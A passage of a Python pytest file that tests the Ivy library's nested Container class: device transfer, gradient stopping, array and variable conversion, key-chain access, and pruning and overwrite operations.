np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
)
def test_container_to_dev(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
    container_to_dev = container.to_dev(device)
    assert ivy.dev(container_to_dev["a"]) == device
    assert ivy.dev(container_to_dev.a) == device
    assert ivy.dev(container_to_dev["b"]["c"]) == device
    assert ivy.dev(container_to_dev.b.c) == device
    assert ivy.dev(container_to_dev["b"]["d"]) == device
    assert ivy.dev(container_to_dev.b.d) == device
def test_container_stop_gradients(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container["a"])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container["b"]["c"])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container["b"]["d"])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_stopped_grads = container.stop_gradients()
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert ivy.is_ivy_array(container_stopped_grads["b"]["d"])
assert ivy.is_ivy_array(container_stopped_grads.b.d)
# with key_chains to apply
container_stopped_grads = container.stop_gradients(key_chains=["a", "b/c"])
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["b"]["d"])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to apply pruned
container_stopped_grads = container.stop_gradients(
key_chains=["a", "b/c"], prune_unapplied=True
)
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert "b/d" not in container_stopped_grads
# with key_chains to not apply
container_stopped_grads = container.stop_gradients(
key_chains=Container({"a": None, "b": {"d": None}}), to_apply=False
)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["a"])
assert ivy.is_variable(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["b"]["d"])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to not apply pruned
container_stopped_grads = container.stop_gradients(
key_chains=Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_stopped_grads
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert "b/d" not in container_stopped_grads
def test_container_as_variables(device, call):
dict_in = {
"a": ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
),
"b": {
"c": ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
),
"d": ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
),
},
}
container = Container(dict_in)
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
variable_cont = container.as_variables()
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(variable_cont["a"])
assert ivy.is_variable(variable_cont.a)
assert ivy.is_variable(variable_cont["b"]["c"])
assert ivy.is_variable(variable_cont.b.c)
assert ivy.is_variable(variable_cont["b"]["d"])
assert ivy.is_variable(variable_cont.b.d)
def test_container_as_arrays(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container["a"])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container["b"]["c"])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container["b"]["d"])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_as_arrays = container.as_arrays()
assert ivy.is_ivy_array(container_as_arrays["a"])
assert ivy.is_ivy_array(container_as_arrays.a)
assert ivy.is_ivy_array(container_as_arrays["b"]["c"])
assert ivy.is_ivy_array(container_as_arrays.b.c)
assert ivy.is_ivy_array(container_as_arrays["b"]["d"])
assert ivy.is_ivy_array(container_as_arrays.b.d)
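# num_arrays counts the array leaves; the ivy.variable leaf in the second
# container below only registers as an array on the numpy and jax backends
# (where variables are plain arrays), hence the backend-dependent expectation.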
def test_container_num_arrays(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
assert container.num_arrays() == 3
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.variable(ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device)),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
    assert container.num_arrays() == (
        3 if call in [helpers.np_call, helpers.jnp_call] else 2
    )
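# size_ordered_arrays flattens the key chains (b__c, b__d) and orders the leaves
# by ascending number of elements, which the zip over values() verifies.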
def test_container_size_ordered_arrays(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0]], device=device),
},
}
container = Container(dict_in)
size_ordered = container.size_ordered_arrays()
assert np.allclose(ivy.to_numpy(size_ordered.a), np.array([[0.0, 1.0, 2.0, 3.0]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__c), np.array([[5.0, 10.0]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__d), np.array([[10.0, 9.0, 8.0]]))
for v, arr in zip(
size_ordered.values(),
[
np.array([[5.0, 10.0]]),
np.array([[10.0, 9.0, 8.0]]),
np.array([[0.0, 1.0, 2.0, 3.0]]),
],
):
assert np.allclose(ivy.to_numpy(v), arr)
def test_container_to_numpy(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
# before conversion
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
# after conversion
container_to_numpy = container.to_numpy()
assert isinstance(container_to_numpy["a"], np.ndarray)
assert isinstance(container_to_numpy.a, np.ndarray)
assert isinstance(container_to_numpy["b"]["c"], np.ndarray)
assert isinstance(container_to_numpy.b.c, np.ndarray)
assert isinstance(container_to_numpy["b"]["d"], np.ndarray)
assert isinstance(container_to_numpy.b.d, np.ndarray)
def test_container_from_numpy(device, call):
dict_in = {
"a": np.array([[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]]),
"b": {
"c": np.array([[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]]),
"d": np.array([[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]]),
},
}
# before conversion
container = Container(dict_in)
assert isinstance(container["a"], np.ndarray)
assert isinstance(container.a, np.ndarray)
assert isinstance(container["b"]["c"], np.ndarray)
assert isinstance(container.b.c, np.ndarray)
assert isinstance(container["b"]["d"], np.ndarray)
assert isinstance(container.b.d, np.ndarray)
# after conversion
container_from_numpy = container.from_numpy()
assert ivy.is_ivy_array(container_from_numpy["a"])
assert ivy.is_ivy_array(container_from_numpy.a)
assert ivy.is_ivy_array(container_from_numpy["b"]["c"])
assert ivy.is_ivy_array(container_from_numpy.b.c)
assert ivy.is_ivy_array(container_from_numpy["b"]["d"])
assert ivy.is_ivy_array(container_from_numpy.b.d)
def test_container_arrays_as_lists(device, call):
dict_in = {
"a": ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
),
"b": {
"c": ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
),
"d": ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
),
},
}
container = Container(dict_in)
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
# without key_chains specification
container_arrays_as_lists = container.arrays_as_lists()
assert isinstance(container_arrays_as_lists["a"], list)
assert isinstance(container_arrays_as_lists.a, list)
assert isinstance(container_arrays_as_lists["b"]["c"], list)
assert isinstance(container_arrays_as_lists.b.c, list)
assert isinstance(container_arrays_as_lists["b"]["d"], list)
assert isinstance(container_arrays_as_lists.b.d, list)
def test_container_has_key(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert container.has_key("a") # noqa
assert container.has_key("b") # noqa
assert container.has_key("c") # noqa
assert container.has_key("d") # noqa
assert not container.has_key("e") # noqa
assert not container.has_key("f") # noqa
def test_container_has_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert container.has_key_chain("a")
assert container.has_key_chain("b")
assert container.has_key_chain("b/c")
assert container.has_key_chain("b/d")
assert not container.has_key_chain("b/e")
assert not container.has_key_chain("c")
def test_container_has_nans(device, call):
container = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([2.0, 3.0], device=device),
"d": ivy.array([3.0, 4.0], device=device),
},
}
)
container_nan = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([float("nan"), 3.0], device=device),
"d": ivy.array([3.0, 4.0], device=device),
},
}
)
container_inf = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([2.0, 3.0], device=device),
"d": ivy.array([3.0, float("inf")], device=device),
},
}
)
container_nan_n_inf = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([float("nan"), 3.0], device=device),
"d": ivy.array([3.0, float("inf")], device=device),
},
}
)
# global
# with inf check
assert not container.has_nans()
assert container_nan.has_nans()
assert container_inf.has_nans()
assert container_nan_n_inf.has_nans()
# without inf check
assert not container.has_nans(include_infs=False)
assert container_nan.has_nans(include_infs=False)
assert not container_inf.has_nans(include_infs=False)
assert container_nan_n_inf.has_nans(include_infs=False)
# leafwise
# with inf check
container_hn = container.has_nans(leafwise=True)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is True
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is True
# without inf check
container_hn = container.has_nans(leafwise=True, include_infs=False)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True, include_infs=False)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True, include_infs=False)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is False
container_nan_n_inf_hn = container_nan_n_inf.has_nans(
leafwise=True, include_infs=False
)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is False
def test_container_at_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
new_container = container.at_keys(["a", "c"])
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_keys("c")
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_keys(["b"])
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
def test_container_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
# explicit function call
sub_container = container.at_key_chain("b")
assert np.allclose(ivy.to_numpy(sub_container["c"]), np.array([2]))
sub_container = container.at_key_chain("b/c")
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
# overridden built-in function call
sub_container = container["b"]
assert np.allclose(ivy.to_numpy(sub_container["c"]), np.array([2]))
sub_container = container["b/c"]
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
def test_container_at_key_chains(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
target_cont = Container({"a": True, "b": {"c": True}})
new_container = container.at_key_chains(target_cont)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_key_chains(["b/c", "b/d"])
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
new_container = container.at_key_chains("b/c")
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_all_key_chains(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
kcs = container.all_key_chains(include_empty)
assert kcs[0] == "a"
assert kcs[1] == "b/c"
assert kcs[2] == "b/d"
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_key_chains_containing(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a_sub": a_val, "b": {"c": bc_val, "d_sub": bd_val}}
container = Container(dict_in)
kcs = container.key_chains_containing("sub", include_empty)
assert kcs[0] == "a_sub"
assert kcs[1] == "b/d_sub"
# noinspection PyUnresolvedReferences
def test_container_set_at_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
orig_container = container_orig.copy()
container = orig_container.set_at_keys({"b": ivy.array([4], device=device)})
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]), np.array([4]))
assert not container.has_key("c") # noqa
assert not container.has_key("d") # noqa
container = orig_container.set_at_keys(
{"a": ivy.array([5], device=device), "c": ivy.array([6], device=device)}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
# noinspection PyUnresolvedReferences
def test_container_set_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
container = container.set_at_key_chain("b/e", ivy.array([4], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
container = container.set_at_key_chain("f", ivy.array([5], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container["f"]), np.array([5]))
# overridden built-in function call
container = container_orig.copy()
assert "b/e" not in container
container["b/e"] = ivy.array([4], device=device)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert "f" not in container
container["f"] = ivy.array([5], device=device)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container["f"]), np.array([5]))
# noinspection PyUnresolvedReferences
def test_container_overwrite_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
# noinspection PyBroadException
try:
container.overwrite_at_key_chain("b/e", ivy.array([4], device=device))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
container = container.overwrite_at_key_chain("b/d", ivy.array([4], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([4]))
def test_container_set_at_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
target_container = Container(
{"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
)
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
target_container = Container({"b": {"c": ivy.array([7], device=device)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
def test_container_overwrite_at_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
target_container = Container(
{"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
)
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
target_container = Container({"b": {"c": ivy.array([7], device=device)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
# noinspection PyBroadException
try:
container.overwrite_at_key_chains(
Container({"b": {"e": ivy.array([5], device=device)}})
)
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
def test_container_prune_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_keys(["a", "c"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
def _test_bd_exception(container_in):
try:
_ = container_in.b.d
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_keys(["a", "d"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.c), np.array([[2]]))
assert "d" not in container_pruned["b"]
assert _test_a_exception(container_pruned)
assert _test_bd_exception(container_pruned)
def test_container_prune_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": None},
}
container = Container(dict_in)
container_pruned = container.prune_key_chain("b/c")
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert container_pruned["b"]["d"] is None
assert container_pruned.b.d is None
assert "c" not in container_pruned["b"].keys()
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
container_pruned = container.prune_key_chain("b")
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert "b" not in container_pruned.keys()
def _test_exception(container_in):
try:
_ = container_in.b
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_chains(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_key_chains(["a", "b/c"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_key_chains(
Container({"a": True, "b": {"c": True}})
)
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
def test_container_format_key_chains(device, call):
dict_in = {
"_a": ivy.array([1], device=device),
"b ": {"c": ivy.array([2], device=device), "d-": ivy.array([3], device=device)},
}
cont = Container(dict_in)
cont_formatted = cont.format_key_chains(
lambda s: s.replace("_", "").replace(" ", "").replace("-", "")
)
assert np.allclose(ivy.to_numpy(cont_formatted["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted.a), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.d), np.array([3]))
def test_container_sort_by_key(device, call):
dict_in = {
"b": ivy.array([1], device=device),
"a": {"d": ivy.array([2], device=device), "c": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_sorted = container.sort_by_key()
for k, k_true in zip(container_sorted.keys(), ["a", "b"]):
assert k == k_true
for k, k_true in zip(container_sorted.a.keys(), ["c", "d"]):
assert k == k_true
def test_container_prune_empty(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": {}, "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_empty()
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_from_key_chains(device, call):
container = Container(
{
"Ayy": ivy.array([1], device=device),
"Bee": {
"Cee": ivy.array([2], device=device),
"Dee": ivy.array([3], device=device),
},
"Beh": {
"Ceh": ivy.array([4], device=device),
"Deh": ivy.array([5], device=device),
},
}
)
# absolute
container_pruned = container.prune_key_from_key_chains("Bee")
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert "Bee" not in container_pruned
# containing
container_pruned = container.prune_key_from_key_chains(containing="B")
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Ceh"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ceh), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned["Deh"]), np.array([[5]]))
assert np.allclose(ivy.to_numpy(container_pruned.Deh), np.array([[5]]))
assert "Bee" not in container_pruned
assert "Beh" not in container_pruned
def test_container_prune_keys_from_key_chains(device, call):
container = Container(
{
"Ayy": ivy.array([1], device=device),
"Bee": {
"Cee": ivy.array([2], device=device),
"Dee": ivy.array([3], device=device),
},
"Eee": {"Fff": ivy.array([4], device=device)},
}
)
# absolute
container_pruned = container.prune_keys_from_key_chains(["Bee", "Eee"])
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Fff"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert "Bee" not in container_pruned
